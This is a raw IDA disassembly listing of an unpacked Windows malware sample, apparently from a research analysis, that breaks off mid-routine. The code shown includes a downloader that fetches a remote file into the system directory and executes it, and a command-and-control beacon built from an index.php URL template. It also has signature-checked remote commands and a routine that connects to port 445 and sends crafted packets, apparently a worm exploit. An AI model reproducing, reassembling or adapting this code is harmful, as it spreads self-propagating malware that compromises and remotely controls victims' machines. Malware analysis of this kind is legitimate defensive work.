; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 0D26A6EC0868FCB83A012261EDE6AB4D ; File Name : u:\work\0d26a6ec0868fcb83a012261ede6ab4d_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31420000 ; Section 1. (virtual address 00001000) ; Virtual size : 00005000 ( 20480.) ; Section size in file : 00005000 ( 20480.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31421000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1Dr dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4Er ... dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8Fr dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+Fr dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6r ... dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57r dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64r ... dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40r dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1Br dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16Cr ... dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2Cr dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116r dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92r dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336r dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12r dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66r ... dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3Fr ... dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3r dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84r ... ; --------------------------------------------------------------------------- loc_31421100: ; DATA XREF: UPX0:loc_31422CD0r xchg eax, esp pop esp retn ; --------------------------------------------------------------------------- db 77h dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AFr ... dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AAr align 10h dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77r ... dd 0 dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9Dr dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89r dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2r dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0r dd 0 dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+ACr dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+Dr dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0r dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67r ... dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8r ... dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128r dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12Fr align 10h dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1 align 10h dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314211A0 proc near ; CODE XREF: sub_31421422+16Dp var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314211CB push 1 jmp loc_31421261 ; --------------------------------------------------------------------------- loc_314211CB: ; CODE XREF: sub_314211A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_3142108C ; GetSystemDirectoryA mov edi, dword_31421088 lea eax, [ebp+var_110] push offset dword_314241F8 push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_31421084 ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_31421F73 pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314241F0 push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31421080 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31421241 push 2 jmp short loc_31421261 ; --------------------------------------------------------------------------- loc_31421241: ; CODE XREF: sub_314211A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31421124 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31421264 push [ebp+var_4] call dword_3142107C ; CloseHandle push 3 loc_31421261: ; CODE XREF: sub_314211A0+26j ; sub_314211A0+9Fj pop eax jmp short loc_314212B5 ; --------------------------------------------------------------------------- loc_31421264: ; CODE XREF: sub_314211A0+B4j mov edi, 100000h push edi call sub_31422CA5 mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31421134 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_31421078 ; WriteFile push [ebp+var_4] call dword_3142107C ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_31421FA3 push ebx call sub_31422CB9 add esp, 0Ch xor eax, eax loc_314212B5: ; CODE XREF: sub_314211A0+C2j pop edi pop esi pop ebx leave retn sub_314211A0 endp ; =============== S U B R O U T I N E ======================================= sub_314212BA proc near ; CODE XREF: sub_31421422+F8p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314212D1: ; CODE XREF: sub_314212BA+56j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 sub dl, [esp+0Ch+arg_8] shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl sub dl, [esp+0Ch+arg_8] add eax, 3 shl bl, 4 and bl, 0F0h or dl, bl mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, 30h jl short loc_314212D1 pop edi pop esi pop ebx retn sub_314212BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421316 proc near ; CODE XREF: sub_3142139B+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31421349 add ebx, 1Ah loc_31421349: ; CODE XREF: sub_31421316+2Ej movsx edi, [ebp+arg_0] mov esi, dword_31421108 lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421373 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421373: ; CODE XREF: sub_31421316+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421393 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421393: ; CODE XREF: sub_31421316+68j mov al, [ebp+arg_0] loc_31421396: ; CODE XREF: sub_31421316+5Bj ; sub_31421316+7Bj pop edi pop esi pop ebx leave retn sub_31421316 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142139B proc near ; CODE XREF: sub_31421422+D6p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314213F8 mov edi, [ebp+arg_0] push ebx loc_314213B0: ; CODE XREF: sub_3142139B+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31421316 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314213DC cmp bl, 7Ah jg short loc_314213DC movsx esi, bl sub esi, 61h loc_314213DC: ; CODE XREF: sub_3142139B+34j ; sub_3142139B+39j cmp bl, 41h jl short loc_314213EC cmp bl, 5Ah jg short loc_314213EC movsx esi, bl sub esi, 41h loc_314213EC: ; CODE XREF: sub_3142139B+44j ; sub_3142139B+49j mov eax, [ebp+arg_4] mov al, [eax] test al, al jnz short loc_314213B0 pop ebx jmp short loc_314213FB ; --------------------------------------------------------------------------- loc_314213F8: ; CODE XREF: sub_3142139B+Fj mov edi, [ebp+arg_0] loc_314213FB: ; CODE XREF: sub_3142139B+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_3142139B endp ; =============== S U B R O U T I N E ======================================= sub_31421402 proc near ; CODE XREF: sub_31421422+104p arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31421406: ; CODE XREF: sub_31421402+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31421406 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_31421402 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421422 proc near ; CODE XREF: sub_314215C7+BAp var_174 = dword ptr -174h var_170 = byte ptr -170h var_168 = byte ptr -168h var_164 = byte ptr -164h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = byte ptr -124h var_11C = byte ptr -11Ch var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421180 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 164h push ebx push esi push edi mov [ebp+var_128], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31421104 ; strstr pop ecx pop ecx mov edi, eax mov [ebp+var_130], edi test edi, edi jz loc_314215A8 add edi, 4 mov [ebp+var_130], edi jz loc_314215A8 push edi call dword_31421084 ; lstrlenA mov [ebp+var_1C], eax cmp eax, 50h jle loc_314215A8 and byte ptr [edi+100h], 0 mov al, [edi] mov [ebp+var_168], al movsx ebx, al sub ebx, 61h mov [ebp+var_12C], ebx js loc_314215A8 cmp ebx, 1Ah jge loc_314215A8 inc edi mov [ebp+var_130], edi push 7Eh push edi call dword_31421108 ; strchr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314215A8 mov al, [esi] mov [ebp+var_170], al and byte ptr [esi], 0 push ebx push edi lea eax, [ebp+var_11C] push eax call sub_3142139B mov al, [ebp+var_170] mov [esi], al inc esi mov [ebp+var_130], esi xor edi, edi push edi lea eax, [ebp+var_164] push eax lea eax, [esi+1] push eax call sub_314212BA lea eax, [ebp+var_164] push eax call sub_31421402 add esp, 1Ch cmp [esi], al jnz short loc_314215A8 push 44h push offset dword_31424000 lea eax, [ebp+var_124] push eax call sub_3142172F add esp, 0Ch lea eax, [ebp+var_174] push eax push 30h lea eax, [ebp+var_164] push eax lea eax, [ebp+var_11C] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_11C] push eax lea eax, [ebp+var_124] push eax call sub_3142179A add esp, 18h test eax, eax jnz short loc_3142159B cmp [ebp+var_174], edi jz short loc_3142159B lea eax, [ebp+var_11C] push eax call sub_314211A0 pop ecx mov [ebp+var_128], edi loc_3142159B: ; CODE XREF: sub_31421422+15Cj ; sub_31421422+164j lea eax, [ebp+var_124] push eax call sub_3142177E pop ecx loc_314215A8: ; CODE XREF: sub_31421422+4Ej ; sub_31421422+5Dj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_128] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_31421422 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314215C7 proc near ; CODE XREF: sub_314216A2+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31422CA5 pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31421090 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_3142162F lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_31424FEC push dword_31425004 push offset aFgnsdrjyrsert ; "fgnsdrjyrsert" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_3142111C ; wsprintfA add esp, 1Ch jmp short loc_31421647 ; --------------------------------------------------------------------------- loc_3142162F: ; CODE XREF: sub_314215C7+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_3142111C ; wsprintfA add esp, 0Ch loc_31421647: ; CODE XREF: sub_314215C7+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31421124 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31421134 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_31421422 push esi call sub_31422CB9 mov esi, dword_3142112C pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_314215C7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_314216A2 proc near ; DATA XREF: sub_314223B2+15Bo push ebx mov ebx, dword_31421098 push esi push edi loc_314216AB: ; CODE XREF: sub_314216A2+88j xor esi, esi mov edi, 46021h loc_314216B2: ; CODE XREF: sub_314216A2+86j inc esi inc esi call sub_31422038 test eax, eax jz short loc_314216FC mov al, byte_31424080[esi+esi*4] push eax push off_31424081[esi+esi*4] call sub_314215C7 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314216FC push 0 push offset dword_31425004 call ebx ; InterlockedExchange push 0 push offset dword_31424FEC call ebx ; InterlockedExchange loc_314216FC: ; CODE XREF: sub_314216A2+19j ; sub_314216A2+46j call dword_314210FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31422068 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_31421094 ; Sleep cmp esi, 16h jb short loc_314216B2 jmp loc_314216AB sub_314216A2 endp ; =============== S U B R O U T I N E ======================================= sub_3142172F proc near ; CODE XREF: sub_31421422+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31421034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 8 push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 1 pop eax jmp short loc_3142177A ; --------------------------------------------------------------------------- loc_3142175C: ; CODE XREF: sub_3142172F+19j ; sub_3142172F+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31421038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_3142177A: ; CODE XREF: sub_3142172F+2Bj pop edi pop esi pop ebx retn sub_3142172F endp ; =============== S U B R O U T I N E ======================================= sub_3142177E proc near ; CODE XREF: sub_31421422+180p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3142102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31421030 ; CryptReleaseContext xor eax, eax pop esi retn sub_3142177E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142179A proc near ; CODE XREF: sub_31421422+152p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3142101C ; CryptCreateHash test eax, eax jnz short loc_314217C0 push 1 pop eax jmp short loc_314217FD ; --------------------------------------------------------------------------- loc_314217C0: ; CODE XREF: sub_3142179A+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31421020 ; CryptHashData test eax, eax jnz short loc_314217D9 push 2 pop edi jmp short loc_314217F2 ; --------------------------------------------------------------------------- loc_314217D9: ; CODE XREF: sub_3142179A+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31421024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314217F2: ; CODE XREF: sub_3142179A+3Dj push [ebp+arg_0] call dword_31421028 ; CryptDestroyHash mov eax, edi loc_314217FD: ; CODE XREF: sub_3142179A+24j pop edi pop esi pop ebp retn sub_3142179A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421801 proc near ; CODE XREF: sub_3142255F+36p ; sub_314225C3+48p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31422CF0 mov eax, dword_31424C84 push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31424C88 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_31421158 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31421D61 push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_3142115C ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax call dword_3142109C ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31424C78 push eax call dword_3142111C ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31421874: ; CODE XREF: sub_31421801+83j mov dl, [ebp+ecx+var_4C] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 28h jl short loc_31421874 push 60h lea eax, [ebp+var_E4] push offset dword_31424798 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl eax, 1 push eax lea eax, [ebp+var_134] push eax lea eax, [ebp+var_B4] push eax call sub_31422CE2 ; memcpy add esp, 1Ch lea eax, [ebp+var_4C] push 9 push (offset aC+3) push eax call sub_31422CDC ; strlen pop ecx lea eax, [ebp+eax*2+var_B5] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen add al, 1Ah push edi shl al, 1 mov [ebp+var_5], al lea eax, [ebp+var_5] push eax lea eax, [ebp+var_E1] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl al, 1 add al, 9 push edi mov [ebp+var_6], al lea eax, [ebp+var_6] push eax lea eax, [ebp+var_B7] push eax call sub_31422CE2 ; memcpy push 0E29h lea eax, [ebp+var_1F28] push 31h push eax call sub_31422CD6 ; memset push 10h lea eax, [ebp+var_24] push ebx push eax call sub_31422CD6 ; memset add esp, 44h mov [ebp+var_24], 2 push 1BDh call dword_31421160 ; ntohs mov [ebp+var_22], ax lea eax, [ebp+var_24] push 10h push eax push [ebp+var_4] mov [ebp+var_20], esi call dword_31421164 ; connect cmp eax, 0FFFFFFFFh jz loc_31421D57 mov esi, dword_31421094 mov edi, 0C8h push edi call esi ; Sleep push ebx mov ebx, dword_31421168 push 89h push offset dword_31424580 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A8h push offset dword_3142460C push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0DEh push offset dword_314246B8 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp eax, 46h jl loc_31421D4C cmp [ebp+var_730], 31h jnz loc_31421BF7 and [ebp+arg_0], 0 push 7D0h lea eax, [ebp+var_F44] push 90h push eax call sub_31422CD6 ; memset add esp, 0Ch push offset byte_314242B8 call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_EA4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 0Ch lea eax, [ebp+var_14] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_788] push eax call sub_31422CE2 ; memcpy mov eax, dword_31424BBE add esp, 0Ch mov [ebp+var_798], eax loc_31421A98: ; CODE XREF: sub_31421801+4E1j movsx eax, [ebp+var_5] add eax, 4 push 0 push eax lea eax, [ebp+var_E4] push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 68h push offset dword_314247FC push [ebp+var_4] call ebx 